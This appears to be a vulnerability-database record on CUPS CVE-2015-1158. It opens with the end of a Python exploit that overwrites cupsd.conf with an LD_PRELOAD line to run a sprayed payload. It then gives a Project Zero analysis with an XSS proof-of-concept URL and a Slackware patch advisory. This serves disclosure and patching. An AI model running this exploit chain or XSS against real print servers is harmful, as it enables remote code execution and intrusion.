original_config + \"\\n\")\r\n return original_config\r\n\r\ndef putConfig(rhost, rport, config):\r\n http_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Keep-Alive\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"overwriting config...\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_request + config))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config)))\r\n\r\ndef poisonConfig(config, name):\r\n config = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d00\" + name + \"-001\\x0a\"\r\n return config\r\n\r\ndef main():\r\n rhost = None;\r\n noshell = None;\r\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])\r\n for opt, arg in options:\r\n if opt in ('-h', '--help'):\r\n usage()\r\n elif opt in ('-a','--rhost'):\r\n rhost = arg;\r\n elif opt in ('-b','--rport'):\r\n rport = arg;\r\n elif opt in ('-c','--lib'):\r\n libpath = arg;\r\n elif opt in ('-f','--stomp-only'):\r\n noshell = 1;\r\n banner()\r\n if rhost is None or rport is None:\r\n usage()\r\n pretty(\"*\",\"locate available printer\")\r\n printer = locatePrinters(rhost, rport)\r\n pretty(\"*\",\"stomp ACL\")\r\n stompACL(rhost, rport, printer)\r\n if (noshell is not None):\r\n pretty(\"*\",\"fin\")\r\n exit(0)\r\n pretty(\"*\",\"prepare payload\")\r\n payload = preparePayload(libpath)\r\n pretty(\"*\",\"spray payload\")\r\n jobid = seedTarget(rhost, rport, printer, payload)\r\n pretty(\"*\",\"grab original config\")\r\n OG_config = getConfig(rhost, rport)\r\n pretty(\"*\",\"generate poison config\")\r\n evil_config = poisonConfig(OG_config, jobid)\r\n pretty(\"*\",\"upload poison config\")\r\n putConfig(rhost, rport, evil_config)\r\n pretty(\"*\",\"fin\")\r\n exit(0);\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41233/"}, {"lastseen": "2016-02-04T05:36:17", "osvdbidlist": ["123116"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "CUPS < 2.0.3 - Multiple Vulnerabilities. CVE-2015-1158. Remote exploits for multiple platform", "reporter": "Google Security Research", "published": "2015-06-22T00:00:00", "type": "exploitdb", "title": "CUPS < 2.0.3 - Multiple Vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2015-06-22T00:00:00", "id": "EDB-ID:37336", "href": "https://www.exploit-db.com/exploits/37336/", "sourceData": "Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html\r\n\r\nAbstract\r\n\r\nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.\r\n\r\nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.\r\n\r\nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.\r\n\r\nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.\r\n\r\nSummary\r\n\r\nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.\r\n\r\nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.\r\n\r\nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.\r\nBackground\r\n\r\nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158)\r\n\r\nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.\r\n\r\nscheduler/ipp.c:1626:\r\n\r\n /*\r\n * Free old strings\u2026 \u2190 Even 'old' strings need to be freed.\r\n */\r\n\r\n for (i = 0; i < attr->num_values; i ++)\r\n {\r\n _cupsStrFree(attr->values[i].string.text);\r\n attr->values[i].string.text = NULL;\r\n if (attr->values[i].string.language) \u2190 for all values in an attribute\r\n {\r\n _cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string\r\n attr->values[i].string.language = NULL;\r\n }\r\n }\r\n\r\nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.\r\n\r\nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.\r\n\r\nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.\r\n\r\nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.\r\n\r\n\r\nA Reflected XSS in the Web Interface (CVE-2015-1159)\r\n\r\nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.\r\n\r\nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.\r\n\r\nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters:\r\n<>\"'&\r\n\r\n These are replaced with their HTML entity equivalents ('<' etc...).\r\n\r\nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:\r\n\r\n if (*s == '<')\r\n {\r\n /*\r\n * Pass <A HREF=\"url\"> and </A>, otherwise quote it...\r\n */\r\n\r\n if (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9))\r\n {\r\n fputs(\"<A HREF=\\\"\", out);\r\n s += 9;\r\n\r\n while (*s && *s != '\\\"')\r\n {\r\n if (*s == '&')\r\n fputs(\"&\", out);\r\n else\r\n putc(*s, out);\r\n\r\n s ++;\r\n }\r\n\r\n if (*s)\r\n s ++;\r\n\r\n fputs(\"\\\">\", out);\r\n }\r\n\r\nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context.\r\n\r\nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.\r\n\r\nTake this example from templates/help-header.tmp:19:\r\n\r\n <P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P>\r\n\r\nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.\r\n\r\nRequesting the following URI will demonstrate this reflected XSS:\r\nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search\r\n\r\nThe 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors.\r\n\r\n\r\nUpstream Fixes\r\n\r\nApple Fix (April 16, 2015):\r\nhttps://support.apple.com/kb/DL1807\r\n\r\nOfficial CUPS fix for downstream vendors (June 8, 2015):\r\nhttps://www.cups.org/str.php?L4609\r\nhttp://www.cups.org/blog.php?L1082+I0+Q\r\n\r\nProject Zero Bug\r\n\r\nFor those interested, the sample exploit can be found here:\r\n\r\nhttps://code.google.com/p/google-security-research/issues/detail?id=455\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37336.tar.gz\r\n\r\nDisclosure Timeline\r\n\r\nMarch 20th, 2015 - Initial notification to Apple\r\nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3\r\nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3\r\nJune 18th, 2015 - Disclosure + 90 days\r\nJune 19th, 2015 - P0 publication\r\n\r\nAttack Surface Reduction in CUPS 2.0.3+\r\n\r\nCUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs:\r\n\r\nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead.\r\nLD_* and DYLD_* environment variables are blocked when CUPS is running as root.\r\nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).\r\n\r\nAcknowledgements\r\n\r\nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.\r\n\r\nConclusion\r\n\r\nNo one prints anything anymore anyways.", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37336/"}], "slackware": [{"lastseen": "2018-08-31T00:37:00", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "1.3.11", "arch": "x86_64", "packageFilename": "cups-1.3.11-x86_64-3_slack13.0.txz", "packageName": "cups", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "1.4.6", "arch": "i486", "packageFilename": "cups-1.4.6-i486-2_slack13.37.txz", "packageName": "cups", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.5.4", "arch": "i486", "packageFilename": "cups-1.5.4-i486-4_slack14.1.txz", "packageName": "cups", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "1.4.5", "arch": "i486", "packageFilename": "cups-1.4.5-i486-3_slack13.1.txz", "packageName": "cups", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "packageVersion": "1.4.6", "arch": "x86_64", "packageFilename": "cups-1.4.6-x86_64-2_slack13.37.txz", "packageName": "cups", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "packageVersion": "1.5.4", "arch": "x86_64", "packageFilename": "cups-1.5.4-x86_64-4_slack14.1.txz", "packageName": "cups", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "1.4.5", "arch": "x86_64", "packageFilename": "cups-1.4.5-x86_64-3_slack13.1.txz", "packageName": "cups", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.5.4", "arch": "x86_64", "packageFilename": "cups-1.5.4-x86_64-3_slack14.0.txz", "packageName": "cups", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "packageVersion": "1.5.4", "arch": "i486", "packageFilename": "cups-1.5.4-i486-3_slack14.0.txz", "packageName": "cups", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "1.3.11", "arch": "i486", "packageFilename": "cups-1.3.11-i486-3_slack13.0.txz", "packageName": "cups", "operator": "lt"}], "description": "New cups packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/cups-1.5.4-i486-4_slack14.1.txz: Rebuilt.\n This release fixes a security issue:\n CWE-911: Improper Update of Reference Count - CVE-2015-1158\n This bug could allow an attacker to upload a replacement CUPS\n configuration file and mount further attacks.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1158\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/cups-1.3.11-i486-3_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/cups-1.3.11-x86_64-3_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/cups-1.4.5-i486-3_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/cups-1.4.5-x86_64-3_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/cups-1.4.6-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/cups-1.4.6-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/cups-1.5.4-i486-3_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/cups-1.5.4-x86_64-3_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/cups-1.5.4-i486-4_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/cups-1.5.4-x86_64-4_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/cups-2.0.3-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/cups-2.0.3-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\nf013abe1761fb1a3a962ee6bb63bb12c cups-1.3.11-i486-3_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n88c5e1cf46eab8fd0d101e8411f10251 cups-1.3.11-x86_64-3_slack13.0.txz\n\nSlackware 13.1 package:\nf71f2b3066f4af9c407df75b1535f179 cups-1.4.5-i486-3_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n2bf27108c7c2772e8adbd984efb0c55e cups-1.4.5-x86_64-3_slack13.1.txz\n\nSlackware 13.37 package:\n0db4e57246873b1817f7332f90dd245f cups-1.4.6-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n8d3ce5ec82218ebb001c0b46d891895a cups-1.4.6-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\nc9130b507a69775f68eb1ca71c2c746c cups-1.5.4-i486-3_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ne91436f9885350bc63a2d9484f974e66 cups-1.5.4-x86_64-3_slack14.0.txz\n\nSlackware 14.1 package:\ne7887e9c90b7501edca14157a85f7c3c cups-1.5.4-i486-4_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n712faf20c729a442d6229de6942aefc5 cups-1.5.4-x86_64-4_slack14.1.txz\n\nSlackware -current package:\nb92d4ad6d8da3487ca0445915ef6aa38 ap/cups-2.0.3-i486-1.txz\n\nSlackware x86_64 -current package:\nf740e4376110c797ef1926d5a94bea5a ap/cups-2.0.3-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg cups-1.5.4-i486-4_slack14.1.txz\n\nThen, restart the cups server:\n > sh /etc/rc.d/rc.cups restart", "edition": 3, "reporter": "Slackware Linux Project", "published": "2015-07-07T17:00:21", "title": "cups", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158"], "modified": "2015-07-07T17:00:21", "id": "SSA-2015-188-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.507395", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}